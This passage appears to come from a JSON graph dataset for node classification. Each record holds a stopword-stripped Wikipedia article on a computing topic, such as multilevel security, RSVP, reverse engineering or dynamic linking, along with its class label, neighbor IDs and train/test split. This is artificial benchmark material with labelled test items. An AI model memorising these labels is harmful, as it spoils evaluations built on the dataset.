single-level environment system high rigid process communication isolation offered mils may useful ultra high reliability software applications mls mils notably address hierarchical structure embodied notion security levels requires addition specific import/export applications domains needs accredited appropriately mils might better called multiple independent domains security mls emulation mils would require similar set accredited applications mls applications declining address box interaction among levels consistent hierarchical relations bell-la padula mils almost deceptively simple implement initially needs non-trivial supplementary import/export applications achieve richness flexibility expected practical mls applications mils/mls comparison consider accreditation set simpler export applications achievable accreditation one complex mls kernel question depends part extent import/export interactions stakeholders require favour mils possibility export applications require maximal assurance another way solving problems known multiple single-level security level isolated separate untrusted domain absence medium communication domains assures interaction possible mechanism isolation usually physical separation separate computers often used support applications operating systems possibility supporting mls microsoft windows infrastructure trusted operating systems important component mls systems order fulfill criteria required definition mls cnssi 4009 paraphrased start article system must provide user interface capable allowing user access process content multiple classification levels one system ucdmo ran track specifically focused mls nsa information assurance symposium 2009 highlighted several accredited production emergent mls systems note use mls selinux several databases classified mls systems oracle product named oracle label security ols implements mandatory access controls typically adding 'label column table oracle database ols deployed us army inscom foundation all-source intelligence database spanning jwics siprnet networks project create labeled version postgresql also older labeled-database implementations trusted rubix mls database systems provide unified back-end system content spanning multiple labels resolve challenge users process content multiple security levels one system enforcing mandatory access controls also several mls end-user applications mls capability currently ucdmo baseline called mlchat chat server runs xts-400 operating system created us naval research laboratory given content users different domains passes mlchat server dirty-word scanning employed protect classified content debate truly mls system form cross-domain transfer data guard mandatory access controls maintained combination xts-400 application-specific mechanisms joint cross domain exchange jcdx another example mls capability currently ucdmo baseline jcdx department defense dod defense intelligence agency dia accredited multilevel security mls command control communication computers intelligence c4i system provides near real-time intelligence warning support theater forward deployed tactical commanders jcdx architecture comprehensively integrated high assurance protection level four pl4 secure operating system utilizing data labeling disseminate near real-time data information force activities potential terrorist threats around world oceans installed locations united states allied partner countries capable providing data top secret/sci secret-releasable levels single platform mls applications currently part ucdmo baseline include several applications bluespace bluespace several mls applications including mls email client mls search application mls c2 system bluespace leverages middleware strategy enable applications platform neutral orchestrating one user interface across multiple windows os instances virtualized remote terminal sessions us naval research laboratory also implemented multilevel web application framework called mlweb integrates ruby rails framework multlevel database based sqlite3 perhaps greatest change going multilevel security arena today convergence mls virtualization increasing number trusted operating systems moving away labeling files processes instead moving towards unix containers virtual machines examples include zones solaris 10 tx padded cell hypervisor systems green hill integrity platform xenclient xt citrix high assurance platform nsa implemented general dynamics trusted virtualization environment tve another example uses selinux core support mls applications span multiple domains",
    "neighbors": [
      2179,
      6797,
      3480,
      3360,
      3616,
      9635,
      5546,
      9646,
      7983,
      11184,
      1585,
      4914,
      11695,
      5433,
      700,
      6337,
      9665,
      5060,
      1350,
      8904,
      1225,
      2761,
      4299,
      11470,
      4303,
      210,
      10962,
      3924,
      10580,
      10968,
      6369,
      4067,
      11363,
      7528,
      11496,
      3440,
      6902,
      5240,
      125,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10171,
    "label": 5,
    "text": "Resource_Reservation_Protocol:resource reservation protocol resource reservation protocol rsvp transport layer protocol designed reserve resources across network quality service qos using integrated services model rsvp operates ipv4 ipv6 provides receiver-initiated setup resource reservations multicast unicast data flows transport application data similar control protocol like internet control message protocol icmp internet group management protocol igmp rsvp described rsvp used hosts routers request deliver specific levels qos application data streams flows rsvp defines applications place reservations relinquish reserved resources longer required rsvp operation generally result resources reserved node along path rsvp routing protocol designed interoperate current future routing protocols rsvp rarely deployed telecommunications networks today traffic engineering extension rsvp rsvp-te becoming widely accepted nowadays many qos-oriented networks next steps signaling nsis proposed replacement rsvp basic concepts rsvp originally proposed rsvp93 zhang l. deering s. estrin d. shenker s. d. zappala rsvp new resource reservation protocol ieee network september 1993 rsvp described series rfc documents ietf two key concepts rsvp reservation model flowspec filterspec rsvp reserves resources flow flow identified destination address protocol identifier optionally destination port multiprotocol label switching mpls flow defined label switched path lsp flow rsvp also identifies particular quality service required flow although understand specific information flow qos qos specific information called flowspec rsvp passes flowspec application hosts routers along path systems analyse flowspec accept reserve resources flowspec consists filterspec defines set packets shall affected flowspec i.e data packets receive qos defined flowspec filterspec typically selects subset packets processed node selection depend attribute packet e.g sender ip address port currently defined rsvp reservation styles rsvp reservation request consists flowspec filterspec pair called flowdescriptor effects node spec flowspec sets parameters packet scheduler node filterspec sets parameters packet classifier two primary types messages data objects rsvp messages transmitted order complete list rsvp messages date objects see rfc 2205 rsvp host needs send data flow specific qos transmit rsvp path message every 30 seconds travel along unicast multicast routes pre-established working routing protocol path message arrives router understand rsvp router forwards message without interpreting contents message reserve resources flow want listen send corresponding resv short reserve message traces path backwards sender resv message contains flow specs router receives rsvp resv message resv message also filterspec object defines packets receive requested qos defined flowspec simple filter spec could sender ’ ip address optionally udp tcp port",
    "neighbors": [
      10242,
      1030,
      8211,
      6681,
      6682,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      8265,
      4687,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      5251,
      649,
      9868,
      3218,
      9365,
      11413,
      152,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      4797,
      702,
      7364,
      8391,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      3322,
      9987,
      3847,
      10005,
      5402,
      5405,
      9511,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      6993,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      871,
      11112,
      361,
      367,
      6512,
      891,
      6524,
      11647,
      1411,
      10115,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      2996,
      3006,
      9670,
      2509,
      8669,
      8670,
      10723,
      10727,
      3564,
      6651,
      3580,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 10172,
    "label": 2,
    "text": "Up2date:up2date up2date also known red hat update agent tool used older versions red hat enterprise linux centos fedora core downloads installs new software upgrades operating system functions front-end rpm package manager adds advanced features automatic dependency resolution file /etc/sysconfig/rhn/sources specifies up2date search packages default red hat enterprise linux up2date retrieves packages red hat network rhn server though users add directories full packages even debian yum repositories wish up2date fedora core defaults retrieving packages yum repositories sources added apart rhn red hat enterprise linux specific fedora core 5 red hat enterprise linux 5 up2date longer shipped distribution yum used instead centos up2date downloads packages yum repositories centos mirror network",
    "neighbors": [
      11525,
      2310,
      10760,
      9353,
      2955,
      7435,
      7181,
      7947,
      9487,
      2448,
      1553,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      2974,
      6393,
      5670,
      4775,
      7847,
      6828,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      5819,
      190,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      10961,
      3667,
      6227,
      4309,
      4951,
      6361,
      2010,
      5723,
      8539,
      9564,
      2401,
      4961,
      1379,
      5988,
      741,
      7140,
      231,
      5096,
      4841,
      6119,
      8554,
      9063,
      9324,
      9455,
      7920,
      6257,
      1138,
      1522,
      10096,
      4729,
      11643,
      7293,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10173,
    "label": 4,
    "text": "Reverse_engineering:reverse engineering reverse engineering also called back engineering process man-made object deconstructed reveal designs architecture extract knowledge object similar scientific research difference scientific research natural phenomenon reverse engineering applicable fields mechanical engineering electronic engineering software engineering chemical engineering systems biology many reasons performing reverse engineering various fields reverse engineering origins analysis hardware commercial military advantage however reverse engineering process concerned creating copy changing artifact way analysis order deduce design features products little additional knowledge procedures involved original production cases goal reverse engineering process simply redocumentation legacy systems even product reverse engineered competitor goal may copy perform competitor analysis reverse engineering may also used create interoperable products despite narrowly tailored united states european union legislation legality using specific reverse engineering techniques purpose hotly contested courts worldwide two decades software reverse engineering help improve understanding underlying source code maintenance improvement software relevant information extracted order make decision software development graphical representations code provide alternate views regarding source code help detect fix software bug vulnerability frequently software develops design information improvements often lost time lost information usually recovered reverse engineering process also help cut time required understand source code reducing overall cost software development reverse engineering also help detect eliminate malicious code written software better code detectors reversing source code used find alternate uses source code detect unauthorized replication source code n't intended used reveal competitors product built process commonly used cracking software media remove copy protection create possibly improved copy even knockoff usually goal competitor hacker malware developers often use reverse engineering techniques find vulnerabilities operating system os order build computer virus exploit system vulnerabilities reverse engineering also used cryptanalysis order find vulnerabilities substitution cipher symmetric-key algorithm public-key cryptography addition purposes uses reverse engineering computer-aided design cad become popular reverse engineering become viable method create 3d virtual model existing physical part use 3d cad cam cae software reverse-engineering process involves measuring object reconstructing 3d model physical object measured using 3d scanning technologies like cmms laser scanners structured light digitizers industrial ct scanning computed tomography measured data alone usually represented point cloud lacks topological information design intent former may recovered converting point cloud triangular-faced mesh reverse engineering aims go beyond producing mesh recover design intent terms simple analytical surfaces appropriate planes cylinders etc well possibly nurbs surfaces produce boundary-representation cad model recovery model allows design modified meet new requirements manufacturing plan generated etc hybrid modelling commonly used term nurbs parametric modelling implemented together using combination geometric freeform surfaces provide powerful method 3d modelling areas freeform data combined exact geometric surfaces create hybrid model typical example would reverse engineering cylinder head includes freeform cast features water jackets high tolerance machined areas reverse engineering also used businesses bring existing physical geometry digital product development environments make digital 3d record products assess competitors products used analyse instance product works components consists estimate costs identify potential patent infringement etc value engineering related activity also used businesses involves de-constructing analysing products objective find opportunities cost cutting 1990 institute electrical electronics engineers ieee defined reverse engineering process analyzing subject system identify system components interrelationships create representations system another form higher level abstraction subject system end product software development reverse engineering process examination software system consideration modified would make re-engineering restructuring reverse engineering performed stage product cycle necessarily functional end product two components reverse engineering redocumentation design recovery redocumentation creation new representation computer code easier understand meanwhile design recovery use deduction reasoning general knowledge personal experience product order fully understand product functionality also seen going backwards development cycle model output implementation phase source code form reverse-engineered back analysis phase inversion traditional waterfall model another term technique program comprehension working conference reverse engineering wcre held yearly explore expand techniques reverse engineering computer-aided software engineering case automated code generation contributed greatly field reverse engineering software anti-tamper technology like obfuscation used deter reverse engineering re-engineering proprietary software software-powered systems practice two main types reverse engineering emerge first case source code already available software higher-level aspects program perhaps poorly documented documented longer valid discovered second case source code available software efforts towards discovering one possible source code software regarded reverse engineering second usage term one people familiar reverse engineering software make use clean room design technique avoid copyright infringement related note black box testing software engineering lot common reverse engineering tester usually api goals find bugs undocumented features bashing product outside purposes reverse engineering include security auditing removal copy protection cracking circumvention access restrictions often present consumer electronics customization embedded systems engine management systems in-house repairs retrofits enabling additional features low-cost crippled hardware graphics card chip-sets even mere satisfaction curiosity binary reverse engineering performed source code software unavailable process sometimes termed reverse code engineering rce example decompilation binaries java platform accomplished using jad one famous case reverse engineering first non-ibm implementation pc bios launched historic ibm pc compatible industry overwhelmingly dominant computer hardware platform many years reverse engineering software protected u.s. fair use exception copyright law samba software allows systems running microsoft windows systems share files systems classic example software reverse engineering since samba project reverse-engineer unpublished information windows file sharing worked non-windows computers could emulate wine project thing windows api openoffice.org one party microsoft office file formats reactos project even ambitious goals strives provide binary abi api compatibility current windows oses nt branch allowing software drivers written windows run clean-room reverse-engineered free software gpl counterpart windowsscope allows reverse-engineering full contents windows system live memory including binary-level graphical reverse engineering running processes another classic well-known example 1987 bell laboratories reverse-engineered mac os system 4.1 originally running apple macintosh se could run risc machines reverse engineering software accomplished various methods three main groups software reverse engineering software classification process identifying similarities different software binaries example two different versions binary used detect code relations software samples task traditionally done manually several reasons patch analysis vulnerability detection copyright infringement nowadays done somewhat automatically large numbers samples method used mostly long thorough reverse engineering tasks complete analysis complex algorithm big piece software general statistical classification considered hard problem also true software classification therefore n't many solutions/tools handle task well number uml tools refer process importing analysing source code generate uml diagrams reverse engineering see list uml tools although uml one approach providing reverse engineering recent advances international standards activities resulted development knowledge discovery metamodel kdm standard delivers ontology intermediate abstracted representation programming language constructs interrelationships object management group standard way becoming iso standard well kdm started take hold industry development tools analysis environments deliver extraction analysis source binary byte code source code analysis kdm granular standards architecture enables extraction software system flows data control call maps architectures business layer knowledge rules terms process standard enables use common data format xmi enabling correlation various layers system knowledge either detailed analysis e.g root cause impact derived analysis e.g business process extraction although efforts represent language constructs never-ending given number languages continuous evolution software languages development new languages standard allow use extensions support broad language set well evolution kdm compatible uml bpmn rdf standards enabling migration environments thus leverage system knowledge efforts software system transformation enterprise business layer analysis protocols sets rules describe message formats messages exchanged i.e. protocol state-machine accordingly problem protocol reverse-engineering partitioned two subproblems message format state-machine reverse-engineering message formats traditionally reverse-engineered tedious manual process involved analysis protocol implementations process messages recent research proposed number automatic solutions typically automatic approaches either group observed messages clusters using various clustering analyses emulate protocol implementation tracing message processing less work reverse-engineering state-machines protocols general protocol state-machines learned either process offline learning passively observes communication attempts build general state-machine accepting observed sequences messages online learning allows interactive generation probing sequences messages listening responses probing sequences general offline learning small state-machines known np-complete online learning done polynomial time automatic offline approach demonstrated comparetti et al online approach cho et al components typical protocols like encryption hash functions reverse-engineered automatically well typically automatic approaches trace execution protocol implementations try detect buffers memory holding unencrypted packets reverse engineering invasive destructive form analyzing smart card attacker grinds away layer layer smart card takes pictures electron microscope technique possible reveal complete hardware software part smart card major problem attacker bring everything right order find everything works makers card try hide keys operations mixing memory positions example bus scrambling cases even possible attach probe measure voltages smart card still operational makers card employ sensors detect prevent attack attack common requires large investment effort special equipment generally available large chip manufacturers furthermore payoff attack low since security techniques often employed shadow accounts uncertain time whether attacks chip/pin cards replicate encryption data consequentially crack pins would provide cost effective attack multifactor authentication reverse engineering often used people order copy nations technologies devices information obtained regular troops fields intelligence operations often used second world war cold war well-known examples wwii later include reverse engineering applies primarily gaining understanding process artifact manner construction use internal processes made clear creator patented items reverse-engineered studied since essence patent inventor provides detailed public disclosure return receives legal protection invention involved however item produced one patents could also include technology patented disclosed indeed one common motivation reverse engineering determine whether competitor product contains patent infringements copyright infringements united states even artifact process protected trade secrets reverse-engineering artifact process often lawful long legitimately obtained reverse engineering computer software us often falls contract law breach contract well relevant laws end user license agreements specifically prohibit u.s. courts ruled terms present override copyright law expressly permits see bowers v. baystate technologies sec 103 f dmca 17 u.s.c § 1201 f says person legal possession program permitted reverse-engineer circumvent protection necessary order achieve interoperability — term broadly covering devices programs able interact make use use transfer data useful ways limited exemption exists allows knowledge thus gained shared used interoperability purposes eu directive 2009/24 legal protection computer programs superseded earlier 1991 directive governs reverse engineering european union",
    "neighbors": [
      519,
      9741,
      7715,
      552,
      3629,
      1588,
      5173,
      55,
      11322,
      7739,
      7742,
      10303,
      1632,
      612,
      107,
      8301,
      2675,
      4211,
      2678,
      5754,
      8830,
      4229,
      4743,
      6797,
      1683,
      8868,
      1722,
      9420,
      10971,
      9440,
      3812,
      8438,
      11006,
      7941,
      8455,
      778,
      7983,
      9519,
      1849,
      2361,
      2370,
      1352,
      11081,
      851,
      1364,
      11604,
      1881,
      4441,
      7515,
      4956,
      9051,
      2948,
      3462,
      7560,
      1941,
      3477,
      5025,
      5028,
      11175,
      3507,
      6069,
      952,
      10683,
      9660,
      9167,
      7639,
      9177,
      477,
      1505,
      8674,
      5604,
      9700,
      1515,
      8171,
      7151,
      6129,
      3573,
      4087,
      2553,
      5117
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10174,
    "label": 8,
    "text": "NetPresenz:netpresenz netpresenz written peter n. lewis stairways software pty ltd world wide web ftp server developed use classic mac os update older product called simply ftpd time significant ftp daemon available macintosh platform added web gopher functionality originally shareware package netpresenz rendered obsolete increasing functionality mac os made freeware work macos",
    "neighbors": [
      6657,
      7943,
      9757,
      10910,
      3110,
      10791,
      9908,
      10808,
      5054,
      576,
      7364,
      10057,
      10060,
      4310,
      119,
      10722,
      494,
      1520,
      9843,
      6133,
      3191,
      3961,
      5114,
      8443,
      637
    ],
    "mask": "Test"
  },
  {
    "node_id": 10175,
    "label": 5,
    "text": "Simple_Loop_Prevention_Protocol:simple loop prevention protocol simple loop prevention protocol slpp computer networking data link layer protocol developed nortel previously acquired avaya part extreme networks protect layer 2 network loops slpp uses small hello packet detect network loops slpp protocol checks packets originating switch peer switch smlt configuration sending hello packets per vlan basis allows slpp detect vlan based network loops un-tagged well tagged ieee 802.1q vlan link configurations loop detected associated port shut =external links=",
    "neighbors": [
      9603,
      1284,
      9937,
      5490,
      1303,
      3580,
      10175
    ],
    "mask": "Test"
  },
  {
    "node_id": 10176,
    "label": 4,
    "text": "Dynamic_linker:dynamic linker computing dynamic linker part operating system loads links shared libraries needed executable executed run time copying content libraries persistent storage ram filling jump tables relocating pointers specific operating system executable format determine dynamic linker functions implemented linking often referred process performed executable compiled dynamic linker special part operating system loads external shared libraries running process binds shared libraries dynamically running process approach also called dynamic linking late linking dynamic-link library dll microsoft implementation shared library concept microsoft windows os/2 operating systems libraries usually file extension codice_1 codice_2 libraries containing activex controls codice_3 legacy system drivers file formats dlls windows exe files portable executable pe 32-bit 64-bit windows new executable ne 16-bit windows exes dlls contain code data resources combination data files file format dll different file extensions possibly containing resource sections called resource dlls examples dlls include icon libraries sometimes extension codice_4 font files extensions codice_5 codice_6 unix-like systems machine code makes dynamic linker actually external executable operating system kernel loads executes first process address space newly constructed result calling codice_7 codice_8 functions link time path dynamic linker used embedded executable image executable file loaded operating system kernel reads path dynamic linker attempts load execute executable binary attempt fails example file path attempt execute original executable fails dynamic linker loads initial executable image dynamically-linked libraries depends starts executable result pathname dynamic linker part operating system application binary interface unix-like systems use elf executable images dynamic libraries solaris 64-bit versions hp-ux linux freebsd netbsd openbsd dragonfly bsd path dynamic linker used embedded link time codice_9 section executable codice_10 segment systems dynamically loaded shared libraries identified filename suffix codice_11 shared object dynamic linker influenced modifying behavior either program execution program linking examples seen run-time linker manual pages various unix-like systems typical modification behavior use codice_12 codice_13 environment variables adjust runtime linking process searching shared libraries alternate locations forcibly loading linking libraries would otherwise respectively example zlibc also known codice_14 facilitates transparent decompression used codice_13 hack result possible read pre-compressed gzipped file data bsd linux systems files compressed essentially allowing user add transparent compression underlying filesystem although caveats mechanism flexible allowing trivial adaptation code perform additional alternate processing data file read prior provision said data user process requested apple darwin operating system macos ios operating systems built top path dynamic linker used embedded link time one mach-o load commands executable image systems dynamically loaded shared libraries identified either filename suffix codice_16 placement inside bundle framework dynamic linker links target executable shared libraries also places machine code functions specific address points memory target executable knows link time executable wishes interact dynamic linker simply executes machine-specific call jump instruction one well-known address points executables macos ios platforms often interact dynamic linker execution process even known executable might interact dynamic linker causing load libraries resolve symbols hours initially launches reason macos ios program interacts dynamic linker often due apple cocoa cocoa touch apis objective-c language implemented see main articles information dynamic linker coerced modifying behavior however unlike unix-like operating systems modifications hints sometimes ignored dynamic linker examples seen codice_17 manual page typical modification behavior use codice_18 codice_19 environment variables former previously-mentioned variables adjusts executables search path shared libraries latter displays names libraries loaded linked apple macos dynamic linker open-source project released part darwin found apple open-source codice_17 project unix-like operating systems using xcoff aix dynamically-loaded shared libraries use filename suffix codice_21 dynamic linker influenced modifying behavior either program execution program linking typical modification behavior use codice_22 environment variable variable adjusts runtime linking process searching shared libraries alternate locations forcibly loading linking libraries would otherwise respectively dynamic linking assembler language programs ibm os/360 successors done typically using link macro instruction containing supervisor call instruction activates operating system routines makes library module linked available program library modules may reside steplib joblib specified control cards available specific execution program library included linklist parmlib specified system startup time link pack area specific reentrant modules loaded system startup time multics operating system files including executables segments call routine part current segment cause system find referenced segment memory disk add address space running process dynamic linking normal method operation static linking using binder exception",
    "neighbors": [
      2432,
      1922,
      3334,
      4998,
      6664,
      8966,
      6797,
      10765,
      5397,
      1304,
      10013,
      7071,
      5921,
      4902,
      7847,
      5546,
      10026,
      7983,
      5040,
      823,
      1724,
      9791,
      9921,
      4423,
      4424,
      5065,
      1106,
      3410,
      2138,
      11361,
      8675,
      868,
      8037,
      10470,
      4712,
      1775,
      7792,
      2673,
      8303,
      11123,
      2164,
      2804,
      6772,
      7421
    ],
    "mask": "Train"
  },
  {
    "node_id": 10177,
    "label": 9,
    "text": "XLNT:xlnt xlnt scripting language windows platforms based dcl language vax-vms machines proprietary implementation maintained originator advanced systems concepts inc. since 1997 implementation contains xlnt executable windows scripting host engine integrated development environment also used cgi mode one handful windows-vms emulation interoperability tools others pc-dcl accelr8 dcl lite console mode interpreters run automated scripting mode older programme type vcl used vms functionality ms-dos pc dos os/2 unix variants vcl run later windows versions provide 16-bit dos programmes run e.g windows nt via win16/dos environmental subsystem program compatibility option windows xp et seq",
    "neighbors": [
      8262,
      6797,
      9166,
      7983,
      8976,
      10387,
      5492,
      2485,
      9780
    ],
    "mask": "Test"
  },
  {
    "node_id": 10178,
    "label": 3,
    "text": "Moon_Patrol:moon patrol player takes role luna city police officer assigned sector nine home toughest thugs galaxy player controls moon buggy travels moon surface viewing side moves towards right side screen driving obstacles craters mines must avoided various enemies ufos tanks ground must shot gameplay within number courses divided 26 checkpoints named letters english alphabet five major checkpoints— e j z —denote new stage new background theme example third stage starting j introduces mines top portion screen shows timeline-style map course five major checkpoints clearly marked map indicator current checkpoint time spent stage three indicator lights top light indicates upcoming enemy aerial attacks middle one indicates upcoming minefield bottom one indicates enemies approaching behind end stage time spent compared average bonus points awarded accordingly 1,000 plus 100 per second bettered completing entire course gives additional 5,000 points plus 100 per second bettered two unique courses beginner course champion course champion course loops forever loop numbered convenience 3 extra lives given 10,000 points per 20,000 scored 50,000 thereafter lives given game ends last patrol car destroyed game continued points scored one game carry 999,990 points maximum high score achieved players exceed score game retains last six digits moon patrol ported apple ii atari 8-bit family atari 2600 atari 5200 atari st commodore 64 vic-20 msx ibm pc ti-99/4a tandy color computer many published atari atarisoft label moon patrol received certificate merit category 1984 best science fiction/ fantasy video game 5th annual arkie awards arcade express reviewed arcade version january 1983 scored 8 10 scott mace infoworld stated moon patrol commodore 64 favorite atarisoft game making good use computer sound moon patrol included retro compilations arcade hits moon patrol spy hunter game boy color midway presents arcade greatest hits midway collection 2 dreamcast playstation windows 2006 bandai released enhanced version moon patrol ex cell phones march 22 2018 moon patrol released nintendo switch hamster part arcade archives series bootleg version called moon ranger released arcades year moon patrol home clones include desert patrol trs-80 color computer 1983 gas hog atari 2600 1983 lunar rover patrol dragon 32 1983 moon buggy commodore 64 1983 moon alert zx spectrum 1984 luna rover zx spectrum 1985 moon control amstrad cpc 1985 moonrider msx 1986 overlander amiga 1993 battle time 1984 commodore 64 re-themed gameplay major wars twentieth century open-source clones named moon-buggy ascii patrol run unix-like terminals",
    "neighbors": [
      11557,
      6405,
      9006,
      1776,
      10931
    ],
    "mask": "None"
  },
  {
    "node_id": 10179,
    "label": 9,
    "text": "Andy_Wellings:andy wellings andy j. wellings professor computer science department university york northern england works closely alan burns real-time systems distributed concurrent real-time programming languages andy wellings member team responsible creation real-time specification java also ada programming language expert wellings written number books programming especially ada",
    "neighbors": [
      428,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 10180,
    "label": 3,
    "text": "POWER10:power10 power10 family multi-core processors based power isa primarily designed ibm substantial contributions openpower foundation partners designed tackle future demands analytics big data domains power10 processors manufactured using 7 nm process feature enhancements compared predecessor power9 regarding core count microarchitecture design memory controllers i/o support opencapi 4.0 nvlink3 systems using power10 expected available 2020",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      398,
      3472,
      4881,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      10675,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      336,
      8530,
      3540,
      342,
      9302,
      11613,
      6878,
      1635,
      869,
      10214,
      10985,
      3185,
      4211,
      5235,
      8058,
      3323,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 10181,
    "label": 9,
    "text": "Actor-Lab:actor-lab actor-lab program visualizes lego mindstorms internal logic visual flowcharts ideas underlying actor-lab derived event-driven message-passing computer languages began actor based languages devised hewit actor-lab requires constant communication programmable brick e.g rcx via infra-red link means user mount programmable brick vertically models move hold tower form gantry crane actor-lab shows user real-time happening programmable brick including simulation motors sensors lights sounds one also add controls bottom screen give oneself real-time control program/model similar program lego called robolab one actually download programs lego programmable brick notice one control edited control power stop",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10182,
    "label": 8,
    "text": "Rambler_(portal):rambler portal rambler russian search engine one biggest russian web portals owned rambler media group prof-media since 2006 launched 1996 stack ltd including sergey lysakov dmitry kryukov vladimir samoylov others rambler online since 1996 2005 rambler media group went public bought prof-media 2006 july 18 2008 announced google acquire begun part rambler media one biggest russian contextual advertising services 140 million deal blocked russian federal antimonopoly service main competitors rambler russian market yandex mail.ru july 2013 rambler ranked 11th popularity among russian sites september 2016 reported site breached february 2012 leakedsource received dump user database time included usernames passwords icq instant messaging accounts 98 million users revealed rambler.ru database stored user passwords plaintext — meaning whoever breached database instantly access e-mail accounts users services offered rambler include web search e-mail news aggregation e-commerce services russian-speaking community globally complemented number rambler media group owned web properties including",
    "neighbors": [
      11347,
      3237
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10183,
    "label": 3,
    "text": "End_of_interrupt:end interrupt end interrupt eoi signal sent programmable interrupt controller pic indicate completion interrupt processing given interrupt eoi used cause pic clear corresponding bit service register isr thus allow interrupt requests equal lower priority generated pic eois may indicate interrupt vector implicitly explicitly explicit eoi vector indicated eoi whereas implicit eoi vector typically use vector indicated pics priority schema example highest vector isr also eois may sent end interrupt processing interrupt handler operation pic may set auto-eoi start interrupt handler",
    "neighbors": [
      3272,
      5457,
      1058,
      5823
    ],
    "mask": "None"
  },
  {
    "node_id": 10184,
    "label": 4,
    "text": "Nolisting:nolisting nolisting name given technique defend electronic mail domain names e-mail spam domain name internet series one mx records specifying mail servers responsible accepting email messages behalf domain preference nolisting simply adding mx record pointing non-existent server primary i.e lowest preference value means initial mail contact always fail many spam sources n't retry failure spammer move next victim legitimate email servers retry next higher numbered mx normal email delivered small delay simple example mx records demonstrate technique defeats spam programs connect highest priority lowest numbered mx follow standard error-handling retrying next priority mx alternate techniques suggest sandwiching valid mx records non-responsive ones variants also suggest configuring highest-numbered hosts always return 4xx errors i.e retry later simple example mx records demonstrate technique greylisting also relies fact spammers often use custom software persevere deliver message correct rfc-compliant way",
    "neighbors": [
      6762,
      9909,
      10906
    ],
    "mask": "None"
  },
  {
    "node_id": 10185,
    "label": 7,
    "text": "Amazon_Drive:amazon drive amazon drive formerly known amazon cloud drive cloud storage application managed amazon service offers secure cloud storage file backup file sharing photo printing using amazon account files folders transferred managed multiple devices including web browsers desktop applications mobiles tablets amazon drive also lets u.s. users order photo prints photo books using amazon prints service today amazon drive offers free unlimited photo storage amazon prime subscription kindle fire device paid limited storage service launched major countries including u.s canada european nations japan australia also functions china brazil free limited 5gb storage service amazon first announced storage service march 29 2011 initially offering pay-as-you-need tiered storage plans users users paid storage tier utilized expandable maximum 1 terabyte plan march 2015 unlimited storage plans intended non-business customer sections introduced plan offered free 3-month free trial customers wish try service entering annual subscription 2015 black friday plan became popular amazon offered 92 discounted unlimited storage plan 5 60 year purchase fine print stated unlimited storage private use restricted file type must substantially exceed differ normal use users amazon anytime may impose restrictions use service june 2017 amazon reverted unlimited storage plans us 15 november 2017 amazon removed unlimited storage plans canadian customers well july 2019 amazon offers two plans marketplaces prime photos since november 2014 free limited file storage china brazil prime photos plan offers unlimited storage photos raw files 5 gigabytes storage videos files photos uploaded amazon drive ios android apps kindle device cloud drive website additionally users kindle fire tablets also get plan benefits along purchase device photos videos automatically backup device amazon drive cloud storage according amazon prime photos available personal non-commercial use ca n't used conjunction photography business full resolution photo formats raw files uploaded raw formats wo n't viewable within service web interface apps china brazil amazon drive service limited 5gb storage storage counts space taken photos videos files types customers countries amazon drive n't offer expansion plan neither tier-based unlimited store media files exceeding limited 5gb service supported almost types devices ranging pcs mobiles web application supported common web browsers including internet explorer firefox safari google chrome one create folders organize files rename files move around forth application handle photos better files web app photos videos viewed played whereas files viewable default images sorted date taken photos include basic metadata filename capture date added date filesize pixel dimension amazon drive released desktop application supported mac windows designed drop panel allowing users drag drop files initiate uploading users install application pc mac use application supports one-touch button downloading files cloud restored notably files 2gb uploaded amazon drive desktop clients bulk upload files folders paused cancelled progress amazon drive offers free smartphone application ios android mobile devices mobile application everything web addition automatically backs upload media files mobile device cloud amazon proprietary devices kindle fire fire phone ship free unlimited photo storage similarly backs photos files tablet amazon drive files folders selected downloaded device generate randomized shareable link link directed e-mailed shared social media anyone link access shared files point time future application allow owner break shared link make files private september 2016 amazon drive launched amazon prints u.s. users edit photos order prints photo books application ordered amazon ship print orders customer address similar retail orders service available major amazon marketplaces applications supported multiple languages usage different countries popular languages supported regional variations english spanish french italian simplified chinese japanese amazon drive also built amazon fire tv amazon video application media players smart tvs devices users browse personal photos videos large tv screens view slideshow prime photo users upload unlimited number picture file formats rest formats including video formats counted additional 5gb storage plan additional files exceeding 5gb need stored one opt unlimited storage plan one paid plans depending country unlimited plans files 2gb restricted uploading application desktop application however exempted uploading files greater 2gb size amazon drive streaming available videos longer 20 minutes larger 2 gb stored amazon drive download watch offline unlike popular file hosting services amazon drive offer file-syncing automatic backup web users latest desktop version documents images also shared documents collaborated others downloaded editing however mobile applications support automatic backup capabilities service limits usage personal non-commercial use one may use store transfer distribute content behalf third parties operate file storage application service operate photography business commercial service",
    "neighbors": [
      8962,
      8451,
      4869,
      2694,
      6027,
      4623,
      5650,
      5660,
      11038,
      11556,
      2217,
      10161,
      10681,
      11201,
      7238,
      10054,
      5960,
      590,
      7248,
      5078,
      1239,
      7512,
      8921,
      2267,
      4574,
      735,
      4710,
      1001,
      4970,
      236,
      8181
    ],
    "mask": "Test"
  },
  {
    "node_id": 10186,
    "label": 9,
